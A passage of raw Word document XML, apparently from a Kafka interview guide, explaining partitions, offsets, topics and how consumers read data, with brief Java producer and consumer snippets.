          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Offsets are ordered within a single partition. However, there is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no global offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Consumer State</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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7F6BB11E" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If a partition has 10 messages, the offsets for these messages will be from 0 to 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6176B6AB"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 Offset 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224AB82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2: Offset 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2788926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3: Offset 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D665802"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4B1A99"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0: Offset 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E48193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CE4B95" w14:paraId="38080C38" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="583C81AF"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24480386"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Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79BBE333"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Offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="22ED0A10" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27C9A161"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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D40C25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n offset is a unique ID representing a message in a partition.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="1F12E41F" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AA7BB5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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FCBB76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Tracks the position of a consumer in a partition's message log.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="3EF45062" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32C63D5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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A2D439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partition has its own sequence of offsets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="6DB8F835" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DBC83C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Replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04189B1A"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are stored within partitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="0F201F8E" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C16E94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Ordering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="460176C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maintain the order of messages in a partition.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="408A0A35" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E673B3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Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3957826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consumers to keep track of which messages have been consumed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AB671E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How Partition and Offset Work Together:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143BFB1E"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Producer Side</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1D65B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Consumer Side</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5DDEE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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Consumers read messages from partitions. Th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 xml:space="preserve">Kafka ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>message order within partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the offset but does not guarantee ordering across partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F21959"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC32D59"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Offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>partitions</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offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00000000" w:rsidP="007149D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="4933DDFB">
          <v:rect id="_x0000_i3314" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45607382" w14:textId="1B1E09BF" w:rsidR="00106B80" w:rsidRPr="00CE4B95" w:rsidRDefault="007C61B8" w:rsidP="00106B80">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="823" w:name="_Toc197868037"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Kafka topics, and how are they used</w:t>
      </w:r>
      <w:r w:rsidR="00106B80" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="823"/>
    </w:p>
    <w:p w14:paraId="3B57C8DE" w14:textId="2FB4F7F8" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, 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a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logical channel or category to which records (messages) are published</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and from which consumers can read them. Think of a topic as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>named stream of data</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C1CE4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0AB60">
          <v:rect id="_x0000_i3315" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73136DA1"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Topic?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B61B2A6"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queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in messaging systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0F593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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> write data to topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE03FF"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 xml:space="preserve"> read data from topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394C1AE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s are </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-subscriber</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning many consumers can read from the same topic independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B05AB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B2DB6">
          <v:rect id="_x0000_i3316" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03952009"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222"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="21AA30AC" w14:textId="77777777" w:rsidTr="00612689">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AFAAEEC"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Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E15494F"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3AB1BA1E" w14:textId="77777777" w:rsidTr="00612689">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1919E937"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12149556"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topic is split into one or more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which allows Kafka to scale horizontally and parallelize consumption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="495F98AF" w14:textId="77777777" w:rsidTr="00612689">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F3DDB6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1315E0D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n index).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="41A37E4F" w14:textId="77777777" w:rsidTr="00612689">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73713FB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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AA6875A"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retains messages for a configurable amount of time, regardless of whether they are consumed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="383164C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E55C8F">
          <v:rect id="_x0000_i3317" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F41C7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Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F47924"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Producer writing to topic "orders"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D81C3E"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new ProducerRecord&lt;&gt;("orders", "orderId123", "Order data"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC038E9" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5419F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Consumer subscribing to "orders"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7473D71D"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Arrays.asList("orders"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1065F4"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CB1B2">
          <v:rect id="_x0000_i3318" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F24033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Topics Are Powerful in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039BB943"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Topics can have many partitions → more consumers → high throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081EEAE0"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Kafka replicates topic data across brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25255B4F"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ecouples</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems: Producers and consumers don’t need to know about each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252CA790"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D9A1AD">
          <v:rect id="_x0000_i3319" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D250C30"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Use Case Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51517536" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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user-activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0A8869"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w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Website logs user actions like login, click, logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581FFE48"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6AFDB3"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nalytics app (tracks engagement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993AB4C"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curity app (monitors suspicious activity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F5255" w14:textId="30AC7A48" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A66AE8"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 me know if you want a visual of topics, partitions, or an example with producers and consumers using Java Spring Boot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658F3B42" w14:textId="06F4FAC5" w:rsidR="00612689" w:rsidRPr="00CE4B95"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3320" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2959BCF2" w14:textId="67EE3E95"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24" w:name="_Toc197868038"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kafka topics and how data is stored in topics and consumed by consumers?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="824"/>
    </w:p>
    <w:p w14:paraId="479514C2" w14:textId="364844F1" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E51096" w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A</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category/feed name</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to which data is published by producers and from which consumers read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A347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A3005D9">
          <v:rect id="_x0000_i3321" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CA7DFC"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ata is Stored in Kafka Topics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D500976"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Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5287B05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w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>split into partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Topic orders can have 3 partitions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A849D1F"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artitions enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelism</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scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8C8BDA"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Data in each partition is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ordered</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DDD8A8"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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CD49D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 line number).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6995DE3E"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stores messages </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>persistently</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
